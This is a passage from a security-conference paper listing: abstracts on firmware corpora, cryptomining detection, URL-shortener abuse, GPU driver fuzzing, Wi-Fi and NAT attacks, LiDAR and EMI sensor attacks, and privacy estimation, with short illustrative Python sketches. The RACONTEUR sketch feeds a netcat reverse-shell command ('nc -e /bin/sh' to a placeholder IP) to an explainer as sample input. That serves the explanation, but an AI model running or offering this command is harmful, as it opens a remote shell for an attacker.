Despite all challenges, how can we maintain the soundness of firmware corpora? This paper thoroughly analyzes the problem space and investigates its impact on research: We distill practical binary analysis challenges that significantly influence corpus creation. We use these insights to derive guidelines that help researchers nurture corpus replicability and representativeness. We apply them to 44 top-tier papers and systematically analyze scientific corpus creation practices. Our comprehensive analysis confirms that there is currently no common ground in related work. It shows the added value of our guidelines, as they discover methodical issues in corpus creation and unveil minuscule stepping stones in documentation. These blur the view on representativeness, hinder replicability, and thus negatively impact the soundness of otherwise excellent work.

Finally, we show the feasibility of our guidelines and build a new corpus for large-scale analyses of Linux firmware: LFwC. We share rich metadata for good (and proven) replicability. We verify unpacking, deduplicate, identify contents, provide ground truth, and demonstrate LFwC’s utility for research.

Topics: Software/firmware/hardware security analysis, customization, and extensions and Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


MineShark: Cryptomining Traffic Detection at Scale
Shaoke Xi, Tianyi Fu, Kai Bu, Chunling Yang, Zhihua Chang, Wenzhi Chen, Zhou Ma (Zhejiang University); Chongjie Chen, Yongsheng Shen (HANG ZHOU CITY BRAIN CO., LTD); Kui Ren (Zhejiang University)

Abstract: The rapid growth of cryptojacking and the increase in regulatory bans on cryptomining have prompted organizations to enhance detection capabilities within their networks. Traditional methods, including rule-based detection and deep packet inspection, fall short in timely and comprehensively identifying new and encrypted mining threats. In contrast, learning-based techniques show promise by identifying content-agnostic traffic patterns, adapting to a wide range of cryptomining configurations. However, existing learning-based systems often lack scalability in real-world detection, primarily due to challenges with unlabeled, imbalanced, and high-speed traffic inputs. To address these issues, we introduce MineShark, a system that identifies robust patterns of mining traffic to distinguish it from vast quantities of benign traffic, and automates the confirmation of model outcomes through active probing to prevent an overload of model alarms. As model inference labels are progressively confirmed, MineShark conducts self-improving updates to enhance model accuracy. MineShark is capable of line-rate detection at various traffic volume scales with the allocation of different amounts of CPU and GPU resources. In a ten-month deployment on a 10 Gbps campus network, MineShark detected cryptomining connections toward 105 mining pools ahead of concurrently deployed commercial systems, 17.6% of which were encrypted. It automatically filtered over 99.3% of false alarms and achieved an average packet processing throughput of 1.3 Mpps, meeting the line-rate demands of a 10 Gbps network with a negligible loss rate of 0.2%. We make MineShark publicly available for broader use.
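
Active probing of suspected endpoints, in general terms, can be illustrated with the following minimal Stratum handshake check. It is a generic sketch only: plain TCP Stratum v1 without TLS, a placeholder host and port, and none of the corner cases a production system like MineShark would have to handle.

```python
import json
import socket

# Minimal active probe: does the remote endpoint answer a Stratum (v1)
# mining.subscribe request like a mining pool would?  Illustrative only.
def looks_like_stratum_pool(host, port, timeout=5.0):
    req = json.dumps({"id": 1, "method": "mining.subscribe", "params": []}) + "\n"
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req.encode())
            s.settimeout(timeout)
            line = s.makefile("r", encoding="utf-8", errors="replace").readline()
    except OSError:
        return False
    try:
        resp = json.loads(line)
    except json.JSONDecodeError:
        return False
    # Stratum pools reply with a JSON-RPC object carrying "result" or "error".
    return isinstance(resp, dict) and ("result" in resp or "error" in resp)

if __name__ == "__main__":
    print(looks_like_stratum_pool("pool.example.com", 3333))   # placeholder target
```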

Topics: Anti-malware techniques: detection, analysis, and prevention and Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response


Misdirection of Trust: Demystifying the Abuse of Dedicated URL Shortening Service
Zhibo Zhang, Lei Zhang, Zhangyue Zhang, Geng Hong, Yuan Zhang, Min Yang (Fudan University)

Abstract: Dedicated URL shortening services (DUSSs) are designed to transform trusted long URLs into shortened links. Since DUSSs are widely used by major corporations to better serve their large numbers of users (especially mobile users), cyber criminals attempt to exploit DUSSs to transform their malicious links and abuse the inherited implicit trust, which we define as the Misdirection Attack in this paper. However, little effort has been made to systematically understand such attacks. To fill this research gap, we present the first systematic study of the Misdirection Attack in abusing DUSSs, to demystify its attack surface, exploitable scope, and security impacts in the real world.

Our study reveals that real-world DUSSs commonly rely on custom URL checks, yet they exhibit unreliable security assumptions regarding web domains and lack adherence to security standards. We design and implement a novel tool, Ditto, for empirically studying vulnerable DUSSs from a mobile perspective. Our large-scale study reveals that a quarter of the DUSSs are susceptible to the Misdirection Attack. More importantly, we find that DUSSs hold implicit trust from both their users and domain-based checkers, extending the consequences of the attack to stealthy phishing and code injection on users’ mobile phones. We have responsibly reported all of our findings to the corporations behind the affected DUSSs and helped them fix their vulnerabilities.
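
A very small part of such an analysis, checking whether a shortened link ultimately redirects off the trusted domain, can be sketched as follows. This is a generic `requests`-based check with placeholder URLs and domains; Ditto itself does far more and from a mobile perspective.

```python
import requests
from urllib.parse import urlparse

# Sketch: follow a shortened link and report whether the final landing page
# leaves the shortener's trusted domain.  Illustrative only.
def redirect_chain(short_url):
    resp = requests.get(short_url, allow_redirects=True, timeout=10)
    return [r.url for r in resp.history] + [resp.url]

def lands_off_domain(short_url, trusted_domain):
    chain = redirect_chain(short_url)
    final_host = urlparse(chain[-1]).hostname or ""
    return not final_host.endswith(trusted_domain), chain

if __name__ == "__main__":
    # Placeholder values; substitute a real DUSS link and its corporate domain.
    off_domain, chain = lands_off_domain("https://t.example.com/abc123",
                                         "example.com")
    print("redirect chain:", " -> ".join(chain))
    print("leaves trusted domain:", off_domain)
```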

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Moneta: Ex-Vivo GPU Driver Fuzzing by Recalling In-Vivo Execution States
Joonkyo Jung, Jisoo Jang, Yongwan Jo (Department of Computer Science, Yonsei University); Jonas Vinck (DistriNet, KU Leuven); Alexios Voulimeneas (CYS, TU Delft); Stijn Volckaert (DistriNet, KU Leuven); Dokyung Song (Department of Computer Science, Yonsei University)

Abstract: Graphics Processing Units (GPUs) have become an indispensable part of modern computing infrastructure. They can execute massively parallel tasks on large data sets and have rich user space-accessible APIs for 3D rendering and general-purpose parallel programming. Unfortunately, the GPU drivers that bridge the gap between these APIs and the underlying hardware have grown increasingly large and complex over the years. Many GPU drivers now expose broad attack surfaces and pose serious security risks.

Fuzzing is a proven automated testing method that mitigates these risks by identifying potential vulnerabilities. However, when applied to GPU drivers, existing fuzzers incur high costs and scale poorly because they rely on physical GPUs. Furthermore, they achieve limited effectiveness because they often fail to meet dependency and timing constraints while generating and executing input events.

We present Moneta, a new ex-vivo approach to driver fuzzing that can statefully and effectively fuzz GPU drivers at scale. The key idea is (i) to recall past, in-vivo GPU driver execution states by synergistically combining snapshot-and-rehost and record-and-replay along with our proposed suite of GPU stack virtualization and introspection techniques, and (ii) to start parallel and stateful ex-vivo GPU driver fuzzing from the recalled states. We implemented a prototype of Moneta and evaluated it on three mainstream GPU drivers. Our prototype triggered deep, live GPU driver states during fuzzing, and found five previously unknown bugs in the NVIDIA GPU driver, three in the AMD Radeon GPU driver, and two in the ARM Mali GPU driver. These ten bugs were all confirmed by the respective vendors in response to our responsible disclosure, and five new CVEs were assigned.

Topic: Software/firmware/hardware security analysis, customization, and extensions


MTZK: Testing and Exploring Bugs in Zero-Knowledge (ZK) Compilers
Dongwei Xiao, Zhibo Liu, Yiteng Peng, Shuai Wang (The Hong Kong University of Science and Technology)

Abstract: Zero-knowledge (ZK) proofs have been increasingly popular in privacy-preserving applications and blockchain systems. To facilitate handy and efficient ZK proof generation for normal users, the industry has designed domain-specific languages (DSLs) and ZK compilers. Given a program in ZK DSL, a ZK compiler compiles it into a circuit, which is then passed to the prover and verifier for ZK checking. However, the correctness of ZK compilers is not well studied, and recent works have shown that de facto ZK compilers are buggy, which can allow malicious users to generate invalid proofs that are accepted by the verifier, causing security breaches and financial losses in cryptocurrency.

In this paper, we propose MTZK, a metamorphic testing framework to test ZK compilers and uncover incorrect compilations. Our approach leverages deliberately designed metamorphic relations (MRs) to mutate ZK compiler inputs. This way, ZK compilers can be automatically tested for compilation correctness using inputs and mutated variants. We propose a set of design considerations and optimizations to deliver an efficient and effective testing framework. In the evaluation of four industrial ZK compilers, we successfully uncovered 21 bugs, out of which the developers have promptly patched 15. We also show possible exploitations of the uncovered bugs to demonstrate their severe security implications.
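
The metamorphic-testing idea can be sketched as the harness below. The `zkc` command-line compiler, its `--stats` flag, and the circuit snippet are all hypothetical placeholders, and the single relation shown (swapping the operands of a commutative multiplication) is ours for illustration, not one of MTZK’s MRs.

```python
import subprocess

# Metamorphic-testing sketch for a ZK compiler.  `zkc` is a HYPOTHETICAL
# compiler binary and the DSL snippet is a placeholder; MTZK's real MRs,
# mutation strategy, and target compilers differ.
SEED = "signal a; signal b; signal c; c <== a * b;"

def equivalent_mutant(src):
    # Toy metamorphic relation: a * b and b * a must compile to circuits
    # that accept exactly the same witnesses.
    return src.replace("a * b", "b * a")

def compile_circuit(src, path):
    with open(path, "w") as f:
        f.write(src)
    out = subprocess.run(["zkc", "--stats", path],      # hypothetical CLI
                         capture_output=True, text=True)
    return out.returncode, out.stdout

rc1, stats1 = compile_circuit(SEED, "seed.zk")
rc2, stats2 = compile_circuit(equivalent_mutant(SEED), "mutant.zk")

# If one variant fails to compile, or the compiled circuits later disagree on a
# shared witness, the relation is violated and a potential compiler bug is logged.
if rc1 != rc2:
    print("MR violation: compilation outcome differs between equivalent programs")
else:
    print("seed stats:\n", stats1, "\nmutant stats:\n", stats2)
```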

Topics: Security and privacy for blockchains and cryptocurrencies and Software/firmware/hardware security analysis, customization, and extensions


Off-Path TCP Hijacking in Wi-Fi Networks: A Packet-Size Side Channel Attack
Ziqiang Wang (Southeast University); Xuewei Feng, Qi Li (Tsinghua University); Kun Sun (George Mason University); Yuxiang Yang (Tsinghua University); Mengyuan Li (University of Toronto); Ganqiu Du (China Software Testing Center); Ke Xu, Jianping Wu (Tsinghua University)

Abstract: In this paper, we unveil a fundamental side channel in Wi-Fi networks, specifically the observable frame size, which can be exploited by attackers to conduct TCP hijacking attacks. Despite the various security mechanisms (e.g., WEP and WPA2/WPA3) implemented to safeguard Wi-Fi networks, our study reveals that an off-path attacker can still extract sufficient information from the frame size side channel to hijack the victim’s TCP connection. Our side channel attack is based on two significant findings: (i) response packets (e.g., ACK and RST) generated by TCP receivers vary in size, and (ii) the encrypted frames containing these response packets have consistent and distinguishable sizes. By observing the size of the victim’s encrypted frames, the attacker can detect and hijack the victim’s TCP connections. We validate the effectiveness of this side channel attack through two case studies, i.e., SSH DoS and web traffic manipulation. Specifically, our attack can terminate the victim’s SSH session in 19 seconds and inject malicious data into the victim’s web traffic within 28 seconds. Furthermore, we conduct extensive measurements to evaluate the impact of our attack on real-world Wi-Fi networks. We test 30 popular wireless routers from 9 well-known vendors, and none of these routers can protect victims from our attack. Moreover, we evaluate our attack in 80 real-world Wi-Fi networks and successfully hijack the victim’s TCP connections in 75 (93.75%) of them. We have responsibly disclosed the vulnerability to the Wi-Fi Alliance and proposed several mitigation strategies to address this issue.
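
The core observation, that fixed per-frame encryption overhead makes small TCP control segments recognizable by size alone, can be sketched as below. The overhead constants are illustrative assumptions, not values measured in the paper, and real overheads depend on the cipher suite and 802.11 options in use.

```python
# Sketch of the packet-size side channel: an observer who only sees encrypted
# Wi-Fi frame lengths tries to spot pure TCP ACK/RST segments.
# The byte counts below are assumed placeholders, not measured values.

WIFI_OVERHEAD = 60      # assumed MAC header + CCMP/GCMP overhead + FCS, bytes
IP_TCP_HEADER = 40      # IPv4 header (20) + TCP header without options (20)

def plausible_payload_len(frame_len):
    """Recover the TCP payload length implied by an observed frame length."""
    return frame_len - WIFI_OVERHEAD - IP_TCP_HEADER

def classify(frame_len):
    payload = plausible_payload_len(frame_len)
    if payload == 0:
        return "pure ACK / RST sized"        # distinguishable control segment
    if payload < 0:
        return "not a plain TCP segment"
    return f"data segment (~{payload} payload bytes)"

# Example over a few synthetic observed frame sizes.
for frame_len in [100, 1560, 612]:
    print(frame_len, "->", classify(frame_len))
```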

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response and Mobile and wireless network security


On the Realism of LiDAR Spoofing Attacks against Autonomous Driving Vehicle at High Speed and Long Distance
Takami Sato (University of California, Irvine, Department of Computer Science); Ryo Suzuki, Yuki Hayakawa, Kazuma Ikeda, Ozora Sako, Rokuto Nagata, Ryo Yoshida (Keio University, Department of Electronics and Electrical Engineering); Qi Alfred Chen (University of California, Irvine, Department of Computer Science); Kentaro Yoshioka (Keio University, Department of Electronics and Electrical Engineering)

Abstract: The rapid deployment of Autonomous Driving (AD) technologies on public roads presents significant social challenges. The security of LiDAR (Light Detection and Ranging) is one of the emerging challenges in AD deployment, given its crucial role in enabling Level 4 autonomy through accurate 3D environmental sensing. Recent lines of research have demonstrated that LiDAR can be compromised by spoofing attacks that overwrite legitimate sensing by emitting malicious lasers at the LiDAR. However, previous studies have demonstrated their attacks only in controlled environments, and gaps remain regarding the feasibility of these attacks in realistic high-speed, long-distance AD scenarios. To bridge these gaps, we design a novel Moving Vehicle Spoofing (MVS) system consisting of 3 subsystems: the LiDAR detection and tracking system, the auto-aiming system, and the LiDAR spoofing system. Furthermore, we design a new object removal attack, the adaptive high-frequency removal (A-HFR) attack, that can be effective even against recent LiDARs with pulse fingerprinting features, by leveraging gray-box knowledge of the scan timing of target LiDARs. With our MVS system, we are not only the first to demonstrate LiDAR spoofing attacks against practical AD scenarios where the victim vehicle is driving at high speed (60 km/h) and the attack is launched from long distances (110 meters), but we are also the first to perform LiDAR spoofing attacks against a vehicle actually operated by a popular AD stack. Our object removal attack achieves ≥96% attack success rates against a vehicle driving at 60 km/h, down to braking distance (20 meters). Finally, we discuss possible countermeasures against attacks with our MVS system. This study not only bridges critical gaps between LiDAR security and AD security research but also sets a foundation for developing robust countermeasures against emerging threats.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems)


Passive Inference Attacks on Split Learning via Adversarial Regularization
Xiaochen Zhu (National University of Singapore and Massachusetts Institute of Technology); Xinjian Luo (National University of Singapore and Mohamed bin Zayed University of Artificial Intelligence); Yuncheng Wu (Renmin University of China); Yangfan Jiang, Xiaokui Xiao, Beng Chin Ooi (National University of Singapore)

Abstract: Split Learning (SL) has emerged as a practical and efficient alternative to traditional federated learning. While previous attempts to attack SL have often relied on overly strong assumptions or targeted easily exploitable models, we seek to develop more capable attacks. We introduce SDAR, a novel attack framework against SL with an honest-but-curious server. SDAR leverages auxiliary data and adversarial regularization to learn a decodable simulator of the client’s private model, which can effectively infer the client’s private features under the vanilla SL, and both features and labels under the U-shaped SL. We perform extensive experiments in both configurations to validate the effectiveness of our proposed attacks. Notably, in challenging scenarios where existing passive attacks struggle to reconstruct the client’s private data effectively, SDAR consistently achieves significantly superior attack performance, even comparable to active attacks. On CIFAR-10, at the deep split level of 7, SDAR achieves private feature reconstruction with less than 0.025 mean squared error in both the vanilla and the U-shaped SL, and attains a label inference accuracy of over 98% in the U-shaped setting, while existing attacks fail to produce non-trivial results.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


PhantomLiDAR: Cross-modality Signal Injection Attacks against LiDAR
Zizhi Jin, Qinhong Jiang, Xuancun Lu, Chen Yan, Xiaoyu Ji, Wenyuan Xu (Zhejiang University)

Abstract: LiDAR (Light Detection and Ranging) is a pivotal sensor for autonomous driving, offering precise 3D spatial information. Previous signal attacks against LiDAR systems mainly exploit laser signals. In this paper, we investigate the possibility of cross-modality signal injection attacks, i.e., injecting intentional electromagnetic interference (IEMI) to manipulate LiDAR output. Our insight is that the internal modules of a LiDAR, i.e., the laser receiving circuit, the monitoring sensors, and the beam-steering modules, even with strict electromagnetic compatibility (EMC) testing, can still couple with the IEMI attack signals and result in the malfunction of LiDAR systems. Based on the above attack surfaces, we propose the PhantomLiDAR attack, which manipulates LiDAR output in terms of Points Interference, Points Injection, Points Removal, and even LiDAR Power-Off. We evaluate and demonstrate the effectiveness of PhantomLiDAR with both simulated and real-world experiments on five COTS LiDAR systems. We also conduct feasibility experiments in real-world moving scenarios. We provide potential defense measures that can be implemented at both the sensor level and the vehicle system level to mitigate the risks associated with IEMI attacks. Video demonstrations can be viewed at https://sites.google.com/view/phantomlidar.

Topics: Mobile and wireless network security; Security and privacy of mobile/smartphone platforms and their operating systems; Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems); Security for emerging networks (e.g., smart homes, IoT, body-area networks, VANETs) and Software/firmware/hardware security analysis, customization, and extensions


PowerRadio: Manipulate Sensor Measurement via Power GND Radiation
Yan Jiang, Xiaoyu Ji, Yancheng Jiang, Kai Wang (Zhejiang University); Chenren Xu (Peking University); Wenyuan Xu (Zhejiang University)

Abstract: Sensors are key components enabling various applications, e.g., home intrusion detection and environment monitoring. While various software defenses and physical protections are used to prevent sensor manipulation, this paper introduces a new threat vector, PowerRadio, which can bypass existing protections and change sensor readings at a distance. PowerRadio leverages interconnected ground (GND) wires, a standard practice for electrical safety at home, to inject malicious signals. The injected signal couples into the sensor’s analog measurement wire and eventually survives the noise filters, inducing incorrect measurements. We present three methods that can manipulate sensors by inducing static bias, periodic signals, or pulses. For instance, we show how to add stripes to the captured images of a surveillance camera or inject inaudible voice commands into conference microphones. We study the underlying principles of PowerRadio and find its root causes: (1) the lack of shielding between ground and data signal wires and (2) the asymmetry of circuit impedance that enables interference to bypass filtering. We validate PowerRadio against a surveillance system, a broadcast system, and various sensors. We believe that PowerRadio represents an emerging threat that combines the advantages of both radiated and conducted EMI, e.g., expanding the effective attack distance of radiated EMI while eliminating the requirement of line of sight or physical proximity. Our insights should provide guidance for enhancing the security of sensors and power wiring during the design phase.

Topics: Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems) and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


RACONTEUR: A Knowledgeable, Insightful, and Portable LLM-Powered Shell Command Explainer
Jiangyi Deng, Xinfeng Li, Yanjiao Chen, Yijie Bai (Zhejiang University); Haiqin Weng, Yan Liu, Tao Wei (Ant Group); Wenyuan Xu (Zhejiang University)

Abstract: Malicious shell commands are linchpins of many cyber attacks, but they are not always easy for security analysts to understand due to complicated and often disguised code structures. Advances in large language models (LLMs) have unlocked the possibility of generating understandable explanations for shell commands. However, existing general-purpose LLMs suffer from a lack of expert knowledge and a tendency to hallucinate in the task of shell command explanation. In this paper, we present Raconteur, a knowledgeable, expressive, and portable shell command explainer powered by an LLM. Raconteur is infused with professional knowledge to provide comprehensive explanations of shell commands, covering not only what the command does (i.e., behavior) but also why the command does it (i.e., purpose). To shed light on the high-level intent of the command, we also translate the natural-language explanation into standard techniques and tactics defined by MITRE ATT&CK, the worldwide cybersecurity knowledge base. To enable Raconteur to explain unseen private commands, we further develop a documentation retriever to obtain relevant information from complementary documentation to assist the explanation process. We have created a large-scale dataset for training and conducted extensive experiments to evaluate the capability of Raconteur in shell command explanation. The experiments verify that Raconteur is able to provide high-quality explanations and in-depth insight into the intent of the command.
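
A bare-bones version of such a documentation retriever, TF-IDF ranking over man-page snippets feeding an explanation prompt, could look like the sketch below. The snippets, the ranking method, and the prompt wording are placeholders of our own; Raconteur’s actual retriever, knowledge infusion, and ATT&CK mapping are more involved.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Bare-bones documentation retriever for a shell-command explainer
# (illustrative only).  The snippets below are made-up placeholders.
DOC_SNIPPETS = [
    "tar -c creates an archive; -z filters it through gzip; -f names the file.",
    "nc (netcat) opens TCP/UDP connections; -e executes a program after connect.",
    "curl transfers data from or to a server; -o writes output to a file.",
]

def retrieve(command, docs, k=1):
    vec = TfidfVectorizer().fit(docs + [command])
    sims = cosine_similarity(vec.transform([command]), vec.transform(docs))[0]
    ranked = sorted(zip(sims, docs), reverse=True)
    return [doc for _, doc in ranked[:k]]

def build_prompt(command):
    context = "\n".join(retrieve(command, DOC_SNIPPETS))
    return (f"Relevant documentation:\n{context}\n\n"
            f"Explain what the following shell command does and why:\n{command}\n")

print(build_prompt("nc -e /bin/sh 203.0.113.5 4444"))
# The assembled prompt would then be passed to the LLM backing the explainer.
```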

Topic: Usable security and privacy


RadSee: See Your Handwriting Through Walls Using FMCW Radar
Shichen Zhang, Qijun Wang, Maolin Gan, Zhichao Cao, Huacheng Zeng (Michigan State University)

Abstract: This paper aims to design and implement a radio device capable of detecting a person’s handwriting through a wall. Although there is extensive research on radio frequency (RF) based human activity recognition, this task is particularly challenging due to the through-wall requirement and the tiny-scale handwriting movements. To address these challenges, we present RadSee, a 6 GHz frequency modulated continuous wave (FMCW) radar system designed for detecting handwriting content behind a wall. RadSee is realized through a joint hardware and software design. On the hardware side, RadSee features a 6 GHz FMCW radar device equipped with two custom-designed, high-gain patch antennas. These two antennas provide a sufficient link power budget, allowing RadSee to “see” through most walls with a small transmission power. On the software side, RadSee extracts effective phase features corresponding to the writer’s hand movements and employs a bidirectional LSTM (BiLSTM) model with an attention mechanism to classify handwriting letters. As a result, RadSee can detect millimeter-level handwriting movements and recognize most letters based on their unique phase patterns. Additionally, it is resilient to interference from other moving objects and in-band radio devices. We have built a prototype of RadSee and evaluated its performance in various scenarios. Extensive experimental results demonstrate that RadSee achieves 75% letter recognition accuracy when victims write 62 random letters, and 87% word recognition accuracy when they write articles.

Topic: Mobile and wireless network security


ReDAN: An Empirical Study on Remote DoS Attacks against NAT Networks
Xuewei Feng, Yuxiang Yang, Qi Li (Tsinghua University); Xingxiang Zhan (Zhongguancun Lab); Kun Sun (George Mason University); Ziqiang Wang, Ao Wang (Southeast University); Ganqiu Du (China Software Testing Center); Ke Xu (Tsinghua University)

Abstract: In this paper, we conduct an empirical study on remote DoS attacks targeting NAT networks (ReDAN, short for Remote DoS Attacks targeting NAT). We show that Internet attackers operating outside local NAT networks possess the capability to remotely identify a NAT device and subsequently terminate TCP connections initiated from the identified NAT device to external servers. Our attack involves two steps. First, we identify NAT devices on the Internet by exploiting inadequacies in the Path MTU Discovery (PMTUD) mechanism within NAT specifications. This deficiency creates a fundamental side channel that allows Internet attackers to distinguish whether a public IPv4 address serves a NAT device or a separate IP host, aiding in the identification of target NAT devices. Second, we launch a remote DoS attack to terminate TCP connections on the identified NAT devices. While recent NAT implementations may include protective measures, such as packet legitimacy validation to prevent malicious manipulation of NAT mappings, we discover that these safeguards are not widely adopted in the real world. Consequently, attackers can send crafted packets to deceive NAT devices into erroneously removing innocent TCP connection mappings, thereby preventing NATed clients from accessing remote TCP servers. Our experimental results reveal widespread security vulnerabilities in existing NAT devices. After testing 8 types of router firmware and 30 commercial NAT devices from 14 vendors, we identify vulnerabilities in 6 firmware types and 29 NAT devices that allow off-path removal of TCP connection mappings. Moreover, our measurements reveal a stark reality: 166 out of 180 (over 92%) tested real-world NAT networks, comprising 90 4G LTE/5G networks, 60 public Wi-Fi networks, and 30 cloud VPS networks, are susceptible to exploitation. We responsibly disclosed the vulnerabilities to the affected vendors and received a significant number of acknowledgments. Finally, we propose countermeasures against the identified DoS attack.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response and Network security policy implementation, deployment, and management


Reinforcement Unlearning
Dayong Ye (University of Technology Sydney); Tianqing Zhu, Congcong Zhu (City University of Macau); Derui Wang (CSIRO’s Data61); Kun Gao (University of Technology Sydney); Zewei Shi (CSIRO’s Data61); Sheng Shen (Torrens University Australia); Wanlei Zhou (City University of Macau); Minhui Xue (CSIRO’s Data61)

Abstract: Machine unlearning refers to the process of mitigating the influence of specific training data on machine learning models based on removal requests from data owners. However, one important area that has been largely overlooked in the research of unlearning is reinforcement learning. Reinforcement learning focuses on training an agent to make optimal decisions within an environment to maximize its cumulative rewards. During the training, the agent tends to memorize the features of the environment, which raises a significant concern about privacy. As per data protection regulations, the owner of the environment holds the right to revoke access to the agent’s training data, thus necessitating the development of a novel and pressing research field, termed reinforcement unlearning. Reinforcement unlearning focuses on revoking entire environments rather than individual data samples. This unique characteristic presents three distinct challenges: 1) how to propose unlearning schemes for environments; 2) how to avoid degrading the agent’s performance in remaining environments; and 3) how to evaluate the effectiveness of unlearning. To tackle these challenges, we propose two reinforcement unlearning methods. The first method is based on decremental reinforcement learning, which aims to erase the agent’s previously acquired knowledge gradually. The second method leverages environment poisoning attacks, which encourage the agent to learn new, albeit incorrect, knowledge to remove the unlearning environment. Particularly, to tackle the third challenge, we introduce the concept of “environment inference” to evaluate the unlearning outcomes. The source code is available at https://github.com/cp-lab-uts/Reinforcement-Unlearning.

Topics: Privacy and anonymity in networks and distributed systems; Security and privacy of mobile/smartphone platforms and their operating systems and Security and privacy of systems based on machine learning, federated learning, AI, and large language models


ReThink: Reveal the Threat of Electromagnetic Interference on Power Inverters
Fengchen Yang, Zihao Dan, Kaikai Pan, Chen Yan, Xiaoyu Ji, Wenyuan Xu (Zhejiang University; ZJU QI-ANXIN IoT Security Joint Laboratory)

Abstract: With the boom of renewable energy sources (RES), the number of power inverters is proliferating. Power inverters are the key electronic devices that transform the direct current (DC) power from RES into the alternating current (AC) power on the grid, and their security can affect the stable operation of RES and even power grids. This paper analyzes the security of photovoltaic (PV) inverters from the perspective of their internal sensors, since these serve as the foundation for safe power conversion. We discover that both the embedded current sensors and voltage sensors are vulnerable to electromagnetic interference (EMI) of 1 GHz or higher, despite electromagnetic compatibility (EMC) countermeasures. Such vulnerabilities can lead to incorrect measurements that deceive the control algorithms. We design ReThink, which can produce three types of consequences on PV inverters by emitting carefully crafted EMI: Denial of Service (DoS), physical damage to inverters, or damped power output. We successfully validate these consequences on 5 off-the-shelf PV inverters, and even in a real-world microgrid, by transmitting EMI signals at a distance of 100-150 cm with a total power within 20 W. Our work aims to raise awareness of the security of the power electronic devices of RES, as they represent an emerging cyber-physical attack surface for the future RES-dominated grid. Finally, to cope with such threats, we provide hardware- and software-based countermeasures.

Topics: Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems); Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid) and Software/firmware/hardware security analysis, customization, and extensions


Revisiting EM-based Estimation for Locally Differentially Private Protocols
Yutong Ye (Institute of Software, Chinese Academy of Sciences & Zhongguancun Laboratory, Beijing, P.R. China); Tianhao Wang (University of Virginia); Min Zhang, Dengguo Feng (Institute of Software, Chinese Academy of Sciences)

Abstract: This paper investigates the fundamental estimation problem in local differential privacy (LDP). We categorize existing estimation methods into two approaches: the unbiased estimation approach, which under LDP often gives unreasonable results (negative estimates, or estimates whose sum does not equal the total number of participating users) due to the excessive amount of noise added in LDP, and the maximum likelihood estimation (MLE)-based approach, which can give reasonable results but often suffers from overfitting. To address this challenge, we propose a reduction framework inspired by Gaussian mixture models (GMM). We adapt the reduction framework to LDP estimation by transferring the estimation problem to the density estimation problem of the mixture model. By merging the smallest-weight component of the mixture model, the EM algorithm converges faster and produces a more robust distribution estimate. We show this framework offers a general and efficient way of modeling various LDP protocols. Through extensive evaluations, we demonstrate the superiority of our approach in terms of mean estimation, categorical distribution estimation, and numerical distribution estimation.
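
The "unreasonable results" of unbiased estimation are easy to reproduce with textbook generalized randomized response (GRR): the sketch below (standard GRR, not this paper’s GMM/EM reduction framework; all parameters are chosen only for illustration) yields negative frequency estimates for rare items at small epsilon.

```python
import numpy as np

# Textbook generalized randomized response (GRR) with its standard unbiased
# estimator, illustrating the negative-estimate problem the paper targets.
rng = np.random.default_rng(0)
k, n, eps = 20, 2000, 0.5
p = np.exp(eps) / (np.exp(eps) + k - 1)      # report the true value w.p. p
q = 1.0 / (np.exp(eps) + k - 1)              # report each other value w.p. q

# Skewed true distribution: item 0 is common, the rest are rare.
true_freq = np.r_[0.5, np.full(k - 1, 0.5 / (k - 1))]
true_items = rng.choice(k, size=n, p=true_freq)

def perturb(v):
    if rng.random() < p:
        return int(v)
    other = int(rng.integers(k - 1))
    return other if other < v else other + 1   # pick uniformly among the others

reports = np.array([perturb(v) for v in true_items])
counts = np.bincount(reports, minlength=k)

# Standard unbiased estimator: f_hat = (counts/n - q) / (p - q)
f_hat = (counts / n - q) / (p - q)
print("estimated frequencies:", np.round(f_hat, 3))
print("number of negative estimates:", int((f_hat < 0).sum()))
```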

Topic: Privacy and anonymity in networks and distributed systems


Revisiting Physical-World Adversarial Attack on Traffic Sign Recognition: A Commercial Systems Perspective
Ningfei Wang, Shaoyuan Xie, Takami Sato, Yunpeng Luo (University of California, Irvine); Kaidi Xu (Drexel University); Qi Alfred Chen (University of California, Irvine)

Abstract: Traffic Sign Recognition (TSR) is crucial for safe and correct driving automation. Recent works revealed a general vulnerability of TSR models to physical-world adversarial attacks, which can be low-cost, highly deployable, and capable of causing severe attack effects such as hiding a critical traffic sign or spoofing a fake one. However, existing works have generally only evaluated the attack effects on academic TSR models, leaving the impacts of such attacks on real-world commercial TSR systems largely unclear. In this paper, we conduct the first large-scale measurement of physical-world adversarial attacks against commercial TSR systems. Our testing results reveal that existing attacks from academia can achieve highly reliable (100%) attack success against certain commercial TSR system functionality, but such attack capabilities are not generalizable, leading to much lower-than-expected attack success rates overall. We find that one potential major factor is a spatial memorization design that commonly exists in today’s commercial TSR systems. We design new attack success metrics that can mathematically model the impacts of such a design on TSR system-level attack success, and use them to revisit existing attacks. Through these efforts, we uncover 7 novel observations, some of which directly challenge the observations or claims in prior works due to the introduction of the new metrics.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems)


Rondo: Scalable and Reconfiguration-Friendly Randomness Beacon
Xuanji Meng (Tsinghua University); Xiao Sui (Shandong University); Zhaoxin Yang (Tsinghua University); Kang Rong, Wenbo Xu, Shenglong Chen, Ying Yan (Blockchain Platform Division, Ant Group); Sisi Duan (Tsinghua University)

